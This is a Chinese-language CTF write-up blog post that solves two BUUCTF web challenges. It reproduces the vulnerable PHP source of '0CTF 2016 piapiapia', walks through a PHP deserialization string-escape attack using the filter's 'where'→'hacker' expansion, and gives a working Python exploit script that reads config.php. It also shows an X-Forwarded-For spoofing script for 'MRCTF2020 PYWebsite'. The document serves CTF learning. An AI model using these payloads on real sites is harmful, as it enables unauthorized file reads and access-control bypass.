BUUCTF-oCTF做题笔记

BUUCTF
发布日期:   2021-09-04
文章字数:   1.7k

[0CTF 2016]piapiapia

1. 常见目录下载www.zip,得到源码

image-20210904013316473www.zip中的内容

  • index.php(用户登陆)
<?php
	require_once('class.php');
	if($_SESSION['username']) {
		header('Location: profile.php');
		exit;
	}
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');

		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');

		if($user->login($username, $password)) {
			$_SESSION['username'] = $username;
			header('Location: profile.php');
			exit;	
		}
		else {
			die('Invalid user name or password');
		}
	}
	else {
?>
  • register.php(注册用户)
<?php
	require_once('class.php');
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');

		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');
		if(!$user->is_exists($username)) {
			$user->register($username, $password);
			echo 'Register OK!<a href="index.php">Please Login</a>';		
		}
		else {
			die('User name Already Exists');
		}
	}
	else {
?>
  • profile.php(显示个人设置)
<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>
  • update.php(更改个人设置)
<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>
  • class.php($user新建的地方)
<?php
require('config.php');

class user extends mysql{
	private $table = 'users';

	public function is_exists($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		return parent::select($this->table, $where);
	}
	public function register($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$key_list = Array('username', 'password');
		$value_list = Array($username, md5($password));
		return parent::insert($this->table, $key_list, $value_list);
	}
	public function login($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		if ($object && $object->password === md5($password)) {
			return true;
		} else {
			return false;
		}
	}
	public function show_profile($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		return $object->profile;
	}
	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}
	public function __tostring() {
		return __class__;
	}
}

class mysql {
	private $link = null;

	public function connect($config) {
		$this->link = mysql_connect(
			$config['hostname'],
			$config['username'], 
			$config['password']
		);
		mysql_select_db($config['database']);
		mysql_query("SET sql_mode='strict_all_tables'");

		return $this->link;
	}

	public function select($table, $where, $ret = '*') {
		$sql = "SELECT $ret FROM $table WHERE $where";
		$result = mysql_query($sql, $this->link);
		return mysql_fetch_object($result);
	}

	public function insert($table, $key_list, $value_list) {
		$key = implode(',', $key_list);
		$value = '\'' . implode('\',\'', $value_list) . '\''; 
		$sql = "INSERT INTO $table ($key) VALUES ($value)";
		return mysql_query($sql);
	}

	public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}

	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function __tostring() {
		return __class__;
	}
}
session_start();
$user = new user();
$user->connect($config);
  • config.php
<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

2. 先注册账户,符合register.php就行

<p>username: chenluo</p>
<p>password: 1111</p>

3. 进行个人设置update.php

  • phone,mail,nickname按照正则传参数
if(!preg_match('/^\d{11}$/', $_POST['phone'])) //要求11位数字
			die('Invalid phone');

if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email'])) //要求正常的email格式
			die('Invalid email');
		
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)//不能用表达式之外的字符,并且不能超过10个,可以用数组绕过
			die('Invalid nickname');
  • file参数,将上传的文件的文件名进行md5加密之后放入upload目录下
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);//存放文件路径
  • 收到所有的参数之后,会调用update_profile函数,进行序列化之后传参
$user->update_profile($username, serialize($profile));


class User:
public function update_profile($username, $new_profile) {
		$username = parent::filter($username); //进行filter过滤
		$new_profile = parent::filter($new_profile); //进行filter过滤

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where); //调用父类的update函数
	}
class mysql:
public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/I'; //将数组链接城字符串
		return preg_replace($safe, 'hacker', $string); //将$safe的字符替换成hacker
	}
public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql); //返回查询结果
	}

4. 显示个人设置

$profile = unserialize($profile);//将读取到的字符串进行反序列化
$photo = base64_encode(file_get_contents($profile['photo'])); //利用file_get_contents得到photo文件

思路:

尝试利用file_get_contents文件读取config.php(flag存放的文件)

5. 解题

先注册账号,之后进行个人设置,系统会将个人设置(phone,email,nickname,photo)序列化后调用update_profile函数,将数据处理完之后,放入数据库,之后在profile.php页面中读取profile内容

一些正则绕过:

nickname //数据绕过

正常的序列化字符串:

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:17:"1144761454@qq.com";s:8:"nickname";a:1:{i:0;s:4:"1234";}s:5:"photo";s:10:"config.php";}

由于photo是题目要求的upload/.md5(filename),我需要尝试利用filter函数进行字符串逃逸

$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/I'; //将数组链接城字符串
		return preg_replace($safe, 'hacker', $string); //将$safe的字符替换成hacker
	}

尝试在nickname加入下面的字符串(这也是需要绕过nickname的原因)

";}s:5:"photo";s:10:"config.php";} //34位的字符

  • 根据filter我们需要加入34个where,替换成hacker后位数倍补足,原本的题目设置的photo被替换成我们加入的字符,反序列化之后photo的值就成为了config.php

  • 写脚本,读取文件

import requests
url = "http://1d22f5e6-97e5-4c7d-bb4f-f02e3c654624.node4.buuoj.cn:81/"
session = requests.Session()//开启session进行登录验证
data1={
    'username':'chenluo',
    'password':'1111'
}
session.post(url=url,data=data1) //先进行登陆
data = {
    'phone': '01234567891',
    'email': '1144761454@qq.com', 'nickname[]':'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}' //添加字符串
}
files={'photo':('img.png',open('./img.png','rb'),'image/png',{})} //上传文件
s = session.post(url=url+'update.php',data=data,files=files) //以post方式访问更改个人设置页面
r = session.post(url=url+'profile.php') //访问个人设置页面,读取内容
print(r.content) //打印输出个人设置页面返回内容

image-20210904013245086读取到的文件

  • 解码查看文件内容

[MRCTF2020]PYWebsite

  1. 直接查看flag.php,根据页面提示写脚本

image-20210904013300869题目提示

  • 自己的ip: 127.0.0.1,构造X-Forwarded-For: 127.0.0.1

  • python访问一下

import requests
url = "http://node4.buuoj.cn:25568/flag.php"

headers = {
    'X-Forwarded-For': '127.0.0.1'
}
s=requests.get(url,headers=headers)

print(s.content)
  • 运行,查看flag
文章作者: 尘落
文章链接: http://39.105.134.199/2021/09/04/25633.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 尘落 !
BUUCTF
评论
  目录